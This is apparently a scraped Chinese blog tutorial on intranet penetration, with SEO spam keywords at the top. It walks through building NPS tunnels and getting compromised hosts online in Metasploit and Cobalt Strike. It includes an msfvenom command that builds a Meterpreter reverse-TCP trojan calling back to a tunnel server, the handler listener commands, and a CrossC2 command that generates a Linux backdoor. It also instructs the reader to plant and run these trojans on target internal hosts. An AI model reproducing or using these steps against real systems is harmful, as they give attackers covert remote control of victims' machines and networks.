一流的高密做网站的,无锡网站建设有限公司,chrome打开建设银行网站 个人网上银行怎么不能查询明细,网站分为哪几种类型目录 内网安全-隧道搭建穿透上线内网穿透-nps-自定义-上线NPS工具介绍搭建过程 nps原理介绍MSF上线CS上线 内网渗透-Linux上线-cs上线Linux主机1.下载插件2.导入插件模块3.配置监听器4.服务端配置5.配置C2监听器并生成木马6.执行木马 内网安全-隧道搭建穿透上线
内网… 目录 内网安全-隧道搭建穿透上线内网穿透-nps-自定义-上线NPS工具介绍搭建过程 nps原理介绍MSF上线CS上线 内网渗透-Linux上线-cs上线Linux主机1.下载插件2.导入插件模块3.配置监听器4.服务端配置5.配置C2监听器并生成木马6.执行木马 内网安全-隧道搭建穿透上线
内网穿透解决网络控制上线网络通讯问题 隧道技术解决不出网协议上线的问题利用出网协议进行封装出网 代理技术解决网络通讯不通的问题利用跳板机建立节点后续操作 内网穿透-nps-自定义-上线
NPS工具介绍 一款轻量级、高性能、功能强大的内网代理服务器。支持tcp、udp、socks5、http等几乎所有流量转发可用于访问内网网站、支付本地接口调试、ssh访问、远程桌面内网dns解析、内网socks5代理等等……并带有功能强大的web管理端。一个轻量级、高性能、强大的内网穿透代理服务器带有强大的web管理端。项目地址https://github.com/ehang-io/nps搭建过程
一、访问项目地址将服务端和客户端所对应的包进行下载windows或Linux版本
以Linux版本为例 下载完成后将服务端的包在服务器进行解压即可解压完成后即可得到nps文件如果没有可执行权限赋予即可使用chmod命令。 安装命令
./nps install运行命令
./nps
//初始用户为admin密码为123
//可通过配置文件自定义修改nps.conf运行状态 访问服务器地址:8080即可搭建完成。 nps原理介绍 运行NPS服务的云服务器和运行NPS客户端的主机之间会创建一条TCP或UDP隧道可以映射云服务器上的某个端口到客户端主机的指定端口其他主机访问云服务器的这个端口的流量都会通过创建的这条隧道转发到映射的主机端口实现内网穿透效果。MSF上线
一、服务端nps在客户端选项处新增客户端 二、将下载下的客户端解压完成后执行客户端命令即可然后在服务端可看到客户端的连接状态 三、执行客户端命令建立连接 四、服务端更新客户端显示在线 五、隧道建立 六、生成木马
msfvenom -p windows/meterpreter/reverse_tcp LHOSTnps服务器ip LPORT服务端转发端口 -f exe -o nps.exe七、kali 开启MSF开启监听
msf6 use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) set payload windows/meterpreter/reverse_tcp
payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) set lhost 0.0.0.0
lhost 0.0.0.0
msf6 exploit(multi/handler) set lport 8888
lport 8888
msf6 exploit(multi/handler) run八、将木马放到目标内网主机当中执行即可 九、成功上线MSF。观察发现本地8888端口。 运行NPS服务的云服务器和运行NPS客户端的主机之间会创建一条TCP或UDP隧道可以映射云服务器上的某个端口到客户端主机的指定端口其他主机访问云服务器的这个端口的流量都会通过创建的这条隧道转发到映射的主机端口实现内网穿透效果。CS上线
nps配置步骤和MSF上线一致。
cs配置创建两个监听器生成木马即可。
一、nps服务器转发配置监听 二、内网上线主机配置监听 三、生成木马即可 四、将木马上传到目标内网机当中执行成功上线 内网渗透-Linux上线-cs上线Linux主机
1.下载插件 crossC2主要面向企业自身及红队人员的安全评估框架支持CobaltStrike对其他平台(Linux/MacOS/…)的安全评估支持自定义模块及包含一些常用的渗透模块。插件地址Release v3.3 - stable · gloxec/CrossC2 (github.com) 2.导入插件模块
将下载下来的.cna导入到脚本管理器当中即可然后进行加载。 成功加载后建议重启CS服务。
3.配置监听器
由于插件只支持HTTPS与TCP所以选择的监听为HTTPS。 4.服务端配置 将下载下来的结尾是.Linux的文件导入到服务器中注意需要导入到CS目录下并赋予执行权限。chmod ux genCrossC2.Linux5.配置C2监听器并生成木马
此处两种方法1图形化界面选择完成后复制生成的命令。2命令行直接生成。 当在之前加载的插件后就会出现这个CroseC2了建议将.Linux文件上传到服务端并添加执行权限后最好是重启以下CS客户端。这里选择HTTPS的选项。生成Linux后门木马。
隐藏文件在服务端通过ls -la可查看 点击生成以后在cs端日志处会出现以下的信息 将此内容复制然后在服务端执行即可。
建议在cs目录下执行去除前面的绝对路径。注意如果不能执行出现问题若日志显示出现MacOS系统内容则是没有修改.cna文件的问题修改.cna文件即可 找到cna文件就是之前加载的cna插件文件修改里面的地址地址是cs文件夹下面的是系统文件也就是刚刚下载的.Linux文件名字其它的是不需要修改的。修改后要将CS客户端重启。修改完成以后再次重新生成木马即可。
或此处生成Linux木马可直接执行命令即可生成。可不用上面的图形化界面操作。如果命令不理解可继续选择上述图形化操作最后复制命令即可。
./genCrossC2.Linux 服务器ip 监听端口 ./.cobaltstrike.beacon_keys null Linux x64 后门名称6.执行木马
将生成的linux木马上传到目标服务器执行即可
成功上线 文件浏览 文章不妥之处欢迎批评指正